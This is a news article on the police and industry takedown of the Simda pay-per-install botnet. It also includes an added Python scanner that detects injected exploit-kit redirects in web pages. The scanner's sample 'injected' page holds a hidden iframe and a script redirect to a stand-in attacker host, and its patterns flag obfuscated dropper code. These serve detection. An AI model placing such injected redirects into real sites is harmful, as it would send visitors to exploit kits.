Backdoor bot brains snatched after cops, white hats raid servers

Password-stealing, malware-spreading Simda nasty found on 770,000 PCs


Microsoft and Interpol have teamed up to derail a botnet that compromised more than 770,000 Windows PCs worldwide.

Simda is a “pay-per-install” software nasty: fraudsters pay miscreants a fee for every 1,000 or so machines they compromise. The hackers effectively earn cash by selling access to the infected computers, renting out the botnet real-estate to other crooks.

Once installed and set up to run after every system startup, the Simda malware kills off antivirus software, logs the user's keystrokes so it can steal passwords and other sensitive information, downloads and executes banking Trojans and other malicious programs, uploads copies of the user's files, and so on.

It opens a backdoor to a command-and-control server, so it can receive orders from the brains behind the malware, and send back any stolen data.

The botnet was seeded by compromising legitimate websites and hijacking them to redirect visitors to sites hosting exploit kits – webpages booby-trapped with code that exploits software vulnerabilities in the visitor's browser or plugins to install the malware without any click.
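The injection a site owner would look for after a compromise of this kind is usually a hidden iframe, an external script tag, or a scripted redirect that sends visitors off to the exploit-kit landing page. The checker below is an added example written for this article, not Simda's code and not anything from Kaspersky Lab or Trend Micro; the sample pages, the `example.com` allow-list and the `evil-landing.example.net` hostname are all constructed for illustration.

```python
"""Flag HTML that redirects visitors off-site, the way a hijacked page
pushes traffic to an exploit-kit landing page.  Added example; the
allow-list and sample pages are constructed, not taken from any real case."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner considers their own (constructed for the example).
KNOWN_GOOD_HOSTS = {"example.com", "www.example.com", "cdn.example.com"}

# Assignments such as  window.location.href = "http://..."  or  location = '...'
_LOCATION_ASSIGN = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)")
# Cheap markers of obfuscated droppers that decode themselves at load time.
_OBFUSCATION = re.compile(r"unescape\(|String\.fromCharCode\(|eval\(")


def _hosted_by_us(url, good_hosts):
    """Relative URLs have no host and count as ours; otherwise check the list."""
    host = urlparse(url or "").hostname
    return host is None or host.lower() in good_hosts


class _RedirectFinder(HTMLParser):
    def __init__(self, good_hosts):
        super().__init__()
        self.good_hosts = good_hosts
        self.findings = []          # list of (kind, evidence)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or a.get("width") in ("0", "1") or a.get("height") in ("0", "1"))
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
            elif not _hosted_by_us(a.get("src"), self.good_hosts):
                self.findings.append(("external-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            if a.get("src") and not _hosted_by_us(a["src"], self.good_hosts):
                self.findings.append(("external-script", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> bodies to handle_data as raw text.
        if not self._in_script:
            return
        for m in _LOCATION_ASSIGN.finditer(data):
            if not _hosted_by_us(m.group(1), self.good_hosts):
                self.findings.append(("script-redirect", m.group(1)))
        if _OBFUSCATION.search(data):
            self.findings.append(("obfuscated-script", data.strip()[:60]))


def scan_html(html, good_hosts=KNOWN_GOOD_HOSTS):
    """Return a list of (kind, evidence) tuples; an empty list means nothing was flagged."""
    finder = _RedirectFinder({h.lower() for h in good_hosts})
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample pages: one carrying a typical injection, one clean.
INJECTED_PAGE = """<html><body><p>Welcome to our shop</p>
<iframe src="http://evil-landing.example.net/ek/" width="1" height="1" style="display:none"></iframe>
<script>window.location.href="http://evil-landing.example.net/go";</script>
</body></html>"""

CLEAN_PAGE = """<html><body><p>Welcome to our shop</p>
<script src="/js/app.js"></script>
<iframe src="https://cdn.example.com/widget"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page))
```

Run it over pages fetched from your own site (not a cached copy from your CMS, since the injection often lives in the served output or a modified template) and treat any hit as a reason to diff the live files against a known-good backup. The allow-list approach deliberately errs on the side of noise: a third-party widget you forgot to list shows up as `external-iframe`, which is cheap to triage compared with missing an injected one.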

The most heavily infected countries were the US, UK, Russia, Canada and Turkey, although Simda spreads its tentacles worldwide. The vast majority of victims were located in the US, where there were more than 90,000 new infections since the start of 2015 alone.

In a series of raids last Thursday, 10 command-and-control servers were physically seized in the Netherlands, with additional servers taken down in the US, Russia, Luxembourg and Poland. The operation involved officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI in the US, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

Security firms Trend Micro and Kaspersky Lab provided the cops with the technical know-how to locate the systems. The crackdown effectively decapitated the botnet by taking away the servers that sent infected PCs their instructions and received swiped passwords and other data.

Windows PCs keelhauled into the botnet remain compromised, hence the need for a cleanup operation. To help victims disinfect their machines, Kaspersky Lab has created a website that checks your public IP address against a database of addresses known to have been infiltrated by Simda. This database was lifted from the command-and-control servers during the takedown raids. Bear in mind that a public IP identifies a network rather than a PC: behind a NAT router, a hit means something on the LAN was infected, not which machine, and addresses handed out dynamically may have changed hands since the data was captured, so treat a clean result as reassuring rather than conclusive and run an up-to-date antivirus scan anyway.

If you're after more technical information, Kaspersky Lab and Trend Micro have both published writeups.

The Simda botnet takedown follows hot on the heels of a similar operation against the Beebone botnet, which also took place last week. ®


Biting the hand that feeds IT © 1998–2021